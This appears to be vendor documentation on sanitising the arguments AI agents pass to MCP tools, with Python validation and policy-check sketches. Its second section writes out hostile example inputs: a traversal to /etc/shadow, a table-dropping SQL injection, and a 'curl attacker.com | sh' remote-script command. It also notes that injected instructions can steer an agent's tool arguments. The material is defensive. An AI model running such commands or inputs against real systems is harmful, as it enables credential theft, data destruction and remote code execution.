What is Input Sanitisation?
Input sanitisation is the process of cleaning and validating the arguments that an AI agent passes to MCP tools before execution, in order to block path traversal, SQL injection, command injection, and malformed requests.
WHY IT MATTERS
Input sanitisation is a foundational security practice from web application development. Every security engineer knows: never trust user input. For AI agents, the principle extends to: never trust agent-generated arguments. The LLM producing tool call arguments is not a trusted source — it is an interpreter of potentially adversarial input.
When an agent calls an MCP tool, the LLM generates the arguments from its context, which may include injected instructions, poisoned tool descriptions, or manipulated user input. Without sanitisation, these arguments flow directly to the MCP server. A file path argument of ../../etc/shadow attempts path traversal out of the intended directory. A SQL argument of '; DROP TABLE users; -- attempts SQL injection. A command argument of curl attacker.com | sh attempts command injection by downloading and running a remote script.
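As an illustration of the path traversal case, here is a minimal Python sketch of a containment check. The sandbox directory /srv/agent-workspace and the function name is_safe_path are assumptions made for this example; they do not come from any particular MCP server.

```python
from pathlib import Path

# Hypothetical sandbox directory; substitute whatever root the tool may access.
ALLOWED_ROOT = Path("/srv/agent-workspace")


def is_safe_path(user_path: str, root: Path = ALLOWED_ROOT) -> bool:
    """Return True only if user_path stays inside root after normalisation."""
    root_resolved = root.resolve()
    # Joining with an absolute path discards the root, so "/etc/shadow"
    # resolves to itself and fails the containment check below.
    candidate = (root_resolved / user_path).resolve()
    # Compare path components rather than string prefixes, so that a sibling
    # such as "/srv/agent-workspace-evil" is not mistaken for a child.
    return candidate == root_resolved or root_resolved in candidate.parents
```

With this check, a relative path such as notes/todo.txt is accepted, while ../../etc/shadow and /etc/shadow are rejected because they resolve outside the sandbox. Resolving before comparing is the important step: a check on the raw string would miss ".." segments and symlinks.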
These are not novel attack classes — they are the same injection vulnerabilities that have plagued web applications for decades. What is new is the attack surface: instead of a human typing into a form, an LLM generates arguments that may incorporate adversarial content from its context window. The agent does not intend malice, but it faithfully reproduces patterns from poisoned input.
Effective sanitisation for MCP tool arguments includes type validation (is this argument the expected type?), range checking (is this number within bounds?), pattern matching (does this path match the allowed pattern?), and content filtering (does this string contain injection patterns?).
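The four checks above can be sketched as a single validation function. This is a minimal illustration, assuming a hypothetical read_log tool with a path and a lines argument; the schema layout, the SUSPICIOUS deny-list, and the function name validate_args are invented for the example and are far narrower than a production filter would need to be.

```python
import re

# Hypothetical schema for an imaginary "read_log" tool (illustrative only).
SCHEMA = {
    "path": {"type": str, "pattern": r"logs/[A-Za-z0-9_\-]+\.log"},
    "lines": {"type": int, "min": 1, "max": 1000},
}

# Deliberately small deny-list: traversal segments and common shell metacharacters.
SUSPICIOUS = re.compile(r"\.\./|[;|`]|\$\(")


def validate_args(args: dict, schema: dict = SCHEMA) -> list:
    """Return a list of error strings; an empty list means the arguments passed."""
    errors = [f"{name}: unexpected argument" for name in args if name not in schema]
    for name, rule in schema.items():
        if name not in args:
            errors.append(f"{name}: missing")
            continue
        value = args[name]
        # Type validation (bool is a subclass of int, so reject it explicitly).
        if isinstance(value, bool) or not isinstance(value, rule["type"]):
            errors.append(f"{name}: expected {rule['type'].__name__}")
            continue
        # Range checking.
        if "min" in rule and value < rule["min"]:
            errors.append(f"{name}: below minimum {rule['min']}")
        if "max" in rule and value > rule["max"]:
            errors.append(f"{name}: above maximum {rule['max']}")
        # Pattern matching against an allow-list pattern (whole string must match).
        if "pattern" in rule and not re.fullmatch(rule["pattern"], value):
            errors.append(f"{name}: does not match allowed pattern")
        # Content filtering against known injection fragments.
        if isinstance(value, str) and SUSPICIOUS.search(value):
            errors.append(f"{name}: contains a suspicious sequence")
    return errors
```

Calling validate_args({"path": "logs/app.log", "lines": 50}) returns an empty list, whereas a path of ../../etc/shadow fails both the pattern match and the content filter. The allow-list pattern does most of the work here; the deny-list is a second line of defence rather than a substitute for it.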
HOW POLICYLAYER USES THIS
Intercept performs argument validation as part of its policy evaluation pipeline. YAML policies define conditions on tool arguments — allowed values, regex patterns, numeric ranges, and string constraints. Before a tool call reaches the MCP server, Intercept evaluates every argument against these conditions. A file path that attempts traversal, a command string that contains injection patterns, or an argument that exceeds its expected range is caught and denied at the proxy layer. This is infrastructure-level sanitisation that operates independently of the agent and the server.
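To make the idea of proxy-layer policy evaluation concrete, the following Python sketch evaluates a tool call against per-argument conditions before it would be forwarded. It is not Intercept's code or its policy schema: the POLICY structure, the condition keys (allowed, regex, min, max), the read_file tool, and the default-deny behaviour are all assumptions made purely for illustration.

```python
import re
from dataclasses import dataclass


@dataclass
class Decision:
    allowed: bool
    reason: str


# Hypothetical policy: tool name -> argument name -> condition.
POLICY = {
    "read_file": {
        "path": {"regex": r"/workspace/[\w\-/]+\.txt"},
        "max_bytes": {"min": 1, "max": 65536},
        "encoding": {"allowed": ["utf-8", "ascii"]},
    },
}


def check(condition: dict, value) -> bool:
    """Return True if value satisfies every constraint in condition."""
    if "allowed" in condition and value not in condition["allowed"]:
        return False
    if "regex" in condition:
        if not isinstance(value, str) or not re.fullmatch(condition["regex"], value):
            return False
    if "min" in condition or "max" in condition:
        if isinstance(value, bool) or not isinstance(value, (int, float)):
            return False
        if value < condition.get("min", float("-inf")):
            return False
        if value > condition.get("max", float("inf")):
            return False
    return True


def evaluate(tool: str, args: dict, policy: dict = POLICY) -> Decision:
    """Decide whether a tool call may be forwarded (default deny, by assumption)."""
    rules = policy.get(tool)
    if rules is None:
        return Decision(False, f"no policy for tool {tool!r}")
    for name, value in args.items():
        condition = rules.get(name)
        if condition is None:
            return Decision(False, f"argument {name!r} is not covered by the policy")
        if not check(condition, value):
            return Decision(False, f"argument {name!r} violates the policy")
    return Decision(True, "all arguments satisfy the policy")
```

In this sketch, a call to read_file with a path of /workspace/../../etc/shadow is denied because the regex admits no dots before the .txt suffix, and a max_bytes value beyond the upper bound is denied by the range condition. The check runs on the arguments alone, so it holds regardless of what the agent was told or how the server handles its input.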